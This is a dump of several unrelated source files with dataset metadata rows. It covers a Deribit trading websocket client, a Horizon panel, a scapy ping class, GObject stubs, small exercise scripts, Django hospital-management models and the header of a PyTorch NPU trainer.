for order_no in order_nos:
params = {"order_id": order_no}
r, e = await self._send_message(method, params)
if e:
error.append((order_no, e))
else:
success.append(order_no)
return success, error
async def get_order_status(self, order_no):
""" 获取订单状态
@param order_no 订单号
"""
method = "private/get_order_state"
params = {"order_id": order_no}
success, error = await self._send_message(method, params)
return success, error
async def get_open_orders(self):
""" 获取未完全成交订单
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def get_open_order_nos(self):
""" 获取未完全成交订单号列表
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return None, error
else:
order_nos = []
for item in success:
order_nos.append(item["order_id"])
return order_nos, None
async def _send_message(self, method, params):
""" 发送消息
"""
f = asyncio.futures.Future()
request_id = await self._generate_query_id()
self._queries[request_id] = f
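        # the future is resolved in process() when a response carrying this id arrives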
data = {
"jsonrpc": "2.0",
"id": request_id,
"method": method,
"params": params
}
await self.ws.send_json(data)
logger.debug("send message:", data, caller=self)
success, error = await f
if error:
logger.error("data:", data, "error:", error, caller=self)
return success, error
@async_method_locker("generate_query_id.locker")
async def _generate_query_id(self):
""" 生成query id,加锁,确保每个请求id唯一
"""
self._query_id += 1
return self._query_id
@async_method_locker("process.locker")
async def process(self, msg):
""" 处理websocket消息
"""
logger.debug("msg:", json.dumps(msg), caller=self)
        # response to an earlier request message (matched by id)
request_id = msg.get("id")
if request_id:
f = self._queries.pop(request_id)
if f.done():
return
success = msg.get("result")
error = msg.get("error")
f.set_result((success, error))
        # pushed subscription message
if msg.get("method") == "subscription":
if msg["params"]["channel"] == self._order_channel:
order_info = msg["params"]["data"]
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, copy.copy(order))
async def _check_position_update(self, *args, **kwargs):
""" 定时获取持仓
"""
if not self._ok:
return
update = False
success, error = await self.get_position()
if error:
return
        if not self._position.utime:  # if the position has not been initialized yet, push an update once after initializing
update = True
self._position.update()
size = int(success["size"])
average_price = float(success["average_price"])
liquid_price = float(success["estimated_liquidation_price"])
if size > 0:
if self._position.long_quantity != size:
update = True
self._position.update(0, 0, size, average_price, liquid_price)
elif size < 0:
if self._position.short_quantity != abs(size):
update = True
self._position.update(abs(size), average_price, 0, 0, liquid_price)
elif size == 0:
if self._position.long_quantity != 0 or self._position.short_quantity != 0:
update = True
self._position.update()
if update:
await self._position_update_callback(self._position)
def _update_order(self, order_info):
""" 更新订单信息
@param order_info 订单信息
"""
order_no = order_info["order_id"]
quantity = int(order_info["amount"])
filled_amount = int(order_info["filled_amount"])
remain = quantity - filled_amount
average_price = order_info.get("average_price")
state = order_info["order_state"]
if state == "open":
status = ORDER_STATUS_SUBMITTED
if filled_amount > 0:
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
elif state == "cancelled":
status = ORDER_STATUS_CANCELED
else:
status = ORDER_STATUS_FAILED
order = self._orders.get(order_no)
if not order:
action = ORDER_ACTION_BUY if order_info["direction"] == "buy" else ORDER_ACTION_SELL
trade_type = int(order_info.get("label"))
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"symbol": self._symbol,
"order_no": order_no,
"action": action,
"price": order_info["price"],
"quantity": quantity,
"remain": remain,
"trade_type": trade_type
}
order = Order(**info)
self._orders[order_no] = order
order.status = status
order.remain = remain
order.avg_price = average_price
order.ctime = order_info["creation_timestamp"]
order.utime = order_info["last_update_timestamp"]
if order.status in [ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED]:
self._orders.pop(order.order_no)
return order
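# A minimal usage sketch (hypothetical account/keys/callbacks; the quant
# framework's event loop must be running, since __init__ calls
# self.initialize() to open the websocket connection):
#
#   async def on_order(order): ...
#   async def on_position(position): ...
#
#   trader = DeribitTrade("my_account", "my_strategy", "BTC-PERPETUAL",
#                         access_key="ACCESS", secret_key="SECRET",
#                         order_update_callback=on_order,
#                         position_update_callback=on_position)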
| [
"[email protected]"
] | |
b2fc4e3cfd43f94cd2d66299af2e1b8145681be7 | fea4402f50b7a340db6122bf900243ada95018d4 | /src/password_manager/panel.py | 95422dcff8e5867e452ed91b6ffda710644ee538 | [] | no_license | CloudPadovana/openstack-security-integrations | ae516c5e7b15cee50fd01da3d69f66bfb26dde10 | fc22a9930aecc466d7b29af4095fbe922962077a | refs/heads/master | 2023-08-08T09:51:30.659062 | 2023-07-28T10:00:28 | 2023-07-28T10:00:28 | 14,750,978 | 0 | 2 | null | 2017-11-17T14:29:47 | 2013-11-27T15:31:37 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2014 INFN - "Istituto Nazionale di Fisica Nucleare" - Italy
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
import horizon
from openstack_dashboard.dashboards.settings import dashboard
class PasswordPanel(horizon.Panel):
name = _("Manage Password")
slug = 'password_manager'
dashboard.Settings.register(PasswordPanel)
| [
"[email protected]"
] | |
6d73d131e26cfb65c423acd5a641958d3283c4e9 | 8704a683e1fa8c7c15d114fca47345eef060326b | /类/Pingclass.py | 37f162cbbd1550ec1a90053f63e4624826cfe8ab | [] | no_license | jiaojiner/Python_Basic | 823be07e8c02585174d933bc3e4ecf528086162c | 788243f95746e2a00890ebb3262085598ab84800 | refs/heads/master | 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# I wrote this code while learning; it is just for fun!
# My QQ: 1945962391
# Feel free to leave a message to discuss, so we can learn and improve together!
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
def __init__(self, srcip, dstip, qua=1):
self.srcip = srcip
self.ip = dstip
self.qua = qua
self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
# def src(self, srcip):
# self.srcip = srcip
# self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
def ping(self):
for x in range(self.qua):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
                print(self.ip, 'is reachable!')
            else:
                print(self.ip, 'is unreachable!')
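# A minimal usage sketch (hypothetical addresses; scapy usually needs root
# privileges to send raw ICMP packets):
#   Pingclass('192.168.1.10', '8.8.8.8', qua=3).ping()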
| [
"[email protected]"
] | |
970b585846494138f5ad4e230612d400e3710200 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | 44594aaf70c93ad1b1494c16df3e8a52cb7efb6d | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 178 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | [
"[email protected]"
] | |
66e0c84a835d00f66e63f4eabefe603562658452 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/EBackend/CollectionBackendClass.py | 9bef82e9cc16e52ae4c3acc39b19c2255df0443e | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 6,476 | py | # encoding: utf-8
# module gi.repository.EBackend
# from /usr/lib64/girepository-1.0/EBackend-1.2.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.EDataServer as __gi_repository_EDataServer
import gi.repository.Gio as __gi_repository_Gio
import gobject as __gobject
class CollectionBackendClass(__gi.Struct):
"""
:Constructors:
::
CollectionBackendClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
child_added = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
child_removed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
dup_resource_id = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
populate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
reserved = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(CollectionBackendClass), '__module__': 'gi.repository.EBackend', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'CollectionBackendClass' objects>, '__weakref__': <attribute '__weakref__' of 'CollectionBackendClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f9dc2d881d0>, 'populate': <property object at 0x7f9dc2d882c0>, 'dup_resource_id': <property object at 0x7f9dc2d883b0>, 'child_added': <property object at 0x7f9dc2d884a0>, 'child_removed': <property object at 0x7f9dc2d88590>, 'create_resource_sync': <property object at 0x7f9dc2d886d0>, 'create_resource': <property object at 0x7f9dc2d88770>, 'create_resource_finish': <property object at 0x7f9dc2d888b0>, 'delete_resource_sync': <property object at 0x7f9dc2d889a0>, 'delete_resource': <property object at 0x7f9dc2d88a40>, 'delete_resource_finish': <property object at 0x7f9dc2d88b80>, 'reserved': <property object at 0x7f9dc2d88c20>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(CollectionBackendClass)
| [
"[email protected]"
] | |
815daa7a085d07da2383291fdfe140fe3de24d40 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex005.py | 0a2cd702fe7a62a4875fa2674961e86c12ac5580 | [] | no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 342 | py | # Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
lessThan1 = int(input("Less than 1 L: "))
moreThan1 = int(input("More than 1 L: "))
refund = (0.1 * lessThan1) + (0.25 * moreThan1)
print("Refund: $" + str(refund))
if __name__ == "__main__": main() | [
"[email protected]"
] | |
8a4708add6cdfe447fdcca3cdccadf54add34fad | 220f1e6f1bd604b0ce452d2337669ad72ef7c11e | /quiz.py | a002fa0a884bdd8c7e27d8c73631451a5e2cfbde | [] | no_license | bikashlama541/RoomA | 9545fa75cf0f02ef4022b692de366423b27d906d | a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1 | refs/heads/master | 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 | Python | UTF-8 | Python | false | false | 547 | py | class Question:
def __init__(self, prompt, answer):
self.prompt = prompt
self.answer = answer
question_prompts = [
"What colors are apple?\n (a) Red/Green\n (b) Orange",
"What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "b"),
]
def run_quiz(questions):
score = 0
for question in questions:
        answer = input(question.prompt)
        if answer == question.answer:
            score += 1
print("You got", score, "out of", len(questions))
run_quiz(questions)
| [
"[email protected]"
] | |
4cce4300cd93c522062d17864b7d7b6579a90919 | eaeb685d13ef6c58364c5497c911f3e2f8c49a43 | /Solution/520_Detect_Capital.py | 72853824378aa294f92113350b1c6fc2394d75c7 | [] | no_license | raririn/LeetCodePractice | 8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64 | 48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03 | refs/heads/master | 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper() or word.islower():
return True
        elif word[0].isupper() and word[1:].islower():
return True
else:
return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
''' | [
"[email protected]"
] | |
8451258e50d96e33c60b41669ed2db703480788c | c5e4a9a66f686de6eaca331f1ee3823ac925101b | /apps/management/models.py | 56efc0b62de24b22ffdb241452489a41abeab41d | [] | no_license | Tiilon/Hospital_project | b1409be60f0d6daecb0e294bfbe81698d97b7c1f | 6506218f4ad504f9031482999d9b33c92b350df8 | refs/heads/main | 2023-01-23T13:30:11.564836 | 2020-11-24T16:15:12 | 2020-11-24T16:15:12 | 303,461,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,585 | py | from random import randrange
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class Ward(models.Model):
label = models.CharField(max_length=100, blank=True, null=True)
incharge = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='ward_incharge', blank=True, null=True)
beds= models.ManyToManyField('Bed', related_name='ward_beds', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='wards', blank=True, null=True)
patients= models.ManyToManyField('Patient', related_name='ward_patients', blank=True)
def __str__(self):
return self.label
    class Meta:
        db_table = 'ward'
BED_STATUS = {
('Assigned', 'Assigned'),
('Unassigned', 'Unassigned')
}
class Bed(models.Model):
number = models.CharField(max_length=200, blank=True, null=True)
ward = models.ForeignKey(Ward, on_delete=models.SET_NULL, related_name='bed_ward',blank=True, null=True)
status = models.CharField(max_length=200,blank=True, null=True, choices=BED_STATUS)
allocate = models.ForeignKey('BedAllocate', on_delete=models.SET_NULL, related_name='bed_allocate', blank=True, null=True)
bed_allocates = models.ManyToManyField('BedAllocate', related_name='bed_bed_allocate', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='beds', blank=True, null=True)
def __str__(self):
return self.number
class Meta:
db_table = 'bed'
ordering = ('number',)
class BedAllocate(models.Model):
bed = models.ForeignKey(Bed, related_name='bed_allocate_bed', blank='True', null=True, on_delete=models.SET_NULL)
patient = models.ForeignKey('Patient', related_name='bed_allocate_patient', null=True, blank=True, on_delete=models.SET_NULL)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='bed_allocates', blank=True, null=True)
def __str__(self):
return f"{self.bed} - {self.patient}"
class Meta:
db_table = 'bed_allocate'
def generate():
FROM = '0123456789'
LENGTH = 10
pat_id = ""
for i in range(LENGTH):
pat_id += FROM[randrange(0, len(FROM))]
return f"PT{pat_id}/{timezone.now().year}"
GENDER = {
('Male', 'Male'),
('Female', 'Female'),
}
PATIENT_TYPE = {
('OPD', 'OPD'),
('Ward', 'Ward'),
('ER', 'EMERGENCY'),
('DISCHARGED', 'DISCHARGED')
}
MARITAL = {
('Married', 'Married'),
('Single', 'Single'),
('Divorced', 'Divorced'),
('Widowed', 'Widowed'),
}
class VitalSign(models.Model):
patient = models.ForeignKey('Patient', on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_sign_patient')
time = models.TimeField(default=timezone.now)
weight = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
diastolic = models.IntegerField( blank=True, null=True)
pulse = models.IntegerField(blank=True, null=True)
systolic = models.IntegerField( blank=True, null=True)
respiration = models.IntegerField( blank=True, null=True)
temperature = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_signs')
class Meta:
db_table = 'vital_sign'
ordering = ('-time',)
def __str__(self):
return f"{self.patient.full_name()}-{self.time}"
class Patient(models.Model):
patient_id = models.CharField(default=generate, unique=True, editable=False, max_length=100)
first_name = models.CharField(max_length=100, blank=True, null=True)
last_name = models.CharField(max_length=100, blank=True, null=True)
patient_type = models.CharField(max_length=100, blank=True, null=True, choices=PATIENT_TYPE)
gender = models.CharField(max_length=100, blank=True, null=True, choices=GENDER)
marital_status = models.CharField(max_length=100,blank=True,null=True,choices=MARITAL)
date_of_birth = models.DateField(blank=True, null=True)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
bed = models.ForeignKey(Bed, on_delete=models.SET_NULL, related_name='patient_bed', blank=True, null=True)
vital_signs = models.ManyToManyField(VitalSign, related_name='patient_vital_signs', blank=True)
discharged_at = models.DateTimeField(blank=True, null=True)
diagnoses = models.ManyToManyField('MedicalDiagnosis', related_name='patient_diagnosis', blank=True)
notes = models.ManyToManyField('department.Note', related_name='patient_notes', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='patients', blank=True, null=True)
def __str__(self):
return self.patient_id
def full_name(self):
return f"{self.first_name} {self.last_name}"
class Meta:
db_table = 'patient'
class MedicalDiagnosis(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='diagnosis_patient', blank=True, null=True)
complaints = models.CharField(max_length=1000, blank=True, null=True)
symptoms = models.CharField(max_length=2000, blank=True, null=True)
diagnosis = models.CharField(max_length=100,blank=True, null=True)
is_admitted = models.BooleanField(blank=True,null=True)
onset = models.CharField(max_length=100, blank=True, null=True)
treatments = models.ManyToManyField('Treatment', related_name='diagnosis_treatments', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='diagnosis', blank=True, null=True)
def __str__(self):
return self.diagnosis
class Meta:
        db_table = 'medical diagnosis'
ordering = ('-created_at',)
TREATMENT_STATUS = {
('Pending', 'Pending'),
('Canceled','Canceled'),
('Completed', 'Completed'),
}
class Treatment(models.Model):
diagnosis = models.ForeignKey(MedicalDiagnosis, on_delete=models.SET_NULL, related_name='treatment_diagnosis', blank='null', null=True)
treatment = models.CharField(max_length=2000, blank=True, null=True)
prescription = models.CharField(max_length=2000, blank=True,null=True)
pharmacy_prescription = models.ForeignKey('pharmacy.Prescription', on_delete= models.SET_NULL, related_name='treatment_prescription', blank=True, null=True)
status = models.CharField(max_length=100,blank=True,null=True, choices= TREATMENT_STATUS)
time_treated = models.TimeField(blank=True, null=True)
date_treated= models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='treatments',blank=True, null=True)
def __str__(self):
return str(self.treatment) + ' - ' + str(self.prescription)
class Meta:
db_table = 'treatment'
ordering = ('-created_at',)
COMPLAINTS_STATUS = {
('Pending', 'Pending'),
('Resolved', 'Resolved'),
('Canceled', 'Canceled'),
}
class Complaints(models.Model):
complaints = models.TextField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaints', blank=False, null=True)
review = models.CharField(max_length=3000, blank=True, null=True)
is_seen = models.BooleanField(blank=True, null=True, default=False)
seen_at = models.DateTimeField(blank=True, null=True)
seen_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_seen', blank=False, null=True)
status = models.CharField(max_length=200, blank=True, null=True, choices=COMPLAINTS_STATUS)
review_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_review',blank=False, null=True)
review_at = models.DateTimeField(blank=True, null=True)
class Meta:
ordering = ('-created_at',)
db_table = 'complaint'
def __str__(self):
return str(self.complaints)
DEPARTMENTS ={
('Ward', 'Ward'),
('Pharmacy', 'Pharmacy'),
('Account', 'Account'),
('Management', 'Management'),
('HR', 'Human Resource')
}
REQUEST_STATUS = {
(0, 'Pending'),
(1, 'Accepted'),
(2, 'Rejected')
}
class Request(models.Model):
department = models.CharField(max_length=200, blank=True, null=True, choices=DEPARTMENTS)
description = models.TextField(max_length=5000, blank=True, null=True)
status = models.IntegerField(blank=True, null= True, choices=REQUEST_STATUS)
comments = models.CharField(max_length=1000, blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='requests', blank=True, null=True)
def __str__(self):
return str(self.department)
class Meta:
db_table = 'request'
class Expenditure(models.Model):
category = models.CharField(max_length=100, blank=True, null=True)
item = models.CharField(max_length=300, blank=True, null=True)
total_cost = models.DecimalField(max_digits=10, blank=True, null=True, decimal_places=2)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='expenditures', blank=True, null=True)
def __str__(self):
return f"{self.category} - {self.total_cost}"
class Meta:
db_table = 'expenditure'
class LeavePeriod(models.Model):
start_date = models.DateField(blank=True, null=True)
end_date = models.DateField(blank=True, null=True)
num_of_days = models.IntegerField(default=0)
days_allowed = models.IntegerField(default=0)
staffs = models.ManyToManyField('staff.Staff', related_name='staff', blank='null')
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='leave_periods', blank=True, null=True)
def __str__(self):
return f"{self.start_date}-{self.end_date}"
class Meta:
db_table = 'leave_period'
STREAMS = {
('Government', 'Government'),
('Patient', 'Patient'),
('Donation', 'Donation')
}
class Revenue(models.Model):
stream = models.CharField(max_length=200, blank=True, null=True, choices=STREAMS)
bill = models.ForeignKey('portal.Bill', related_name='revenue_bill', on_delete=models.SET_NULL, blank=True, null=True)
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='revenue_patient', blank=True, null=True)
description = models.CharField(max_length=100, blank=True, null=True)
amount = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(blank=True, null=True)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='revenues')
def __str__(self):
return str(self.stream)
class Meta:
db_table = 'revenue'
ordering = ('-created_at',)
A_STATUS = {
('Show', 'Show'),
('Hide', 'Hide')
}
# class Announcement(models.Model):
# message = models.CharField(max_length=200, blank=True, null=True)
# title = models.CharField(max_length=200, blank=True, null=True)
# status = models.CharField(max_length=200, blank=True, null=True, choices=A_STATUS) | [
"[email protected]"
] | |
268df992d4a58fa7d9720b5e331578c2652054a2 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_segmentation/NAS-SEGM_ID1142_for_PyTorch/src/engine/trainer.py | 6e598066959d4fb2592982d4218e84c0c4d156e0 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,811 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
"""Training functions"""
import time
import logging
from collections import defaultdict
import numpy as np
import torch
from torch import nn
from helpers.utils import AverageMeter, try_except
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
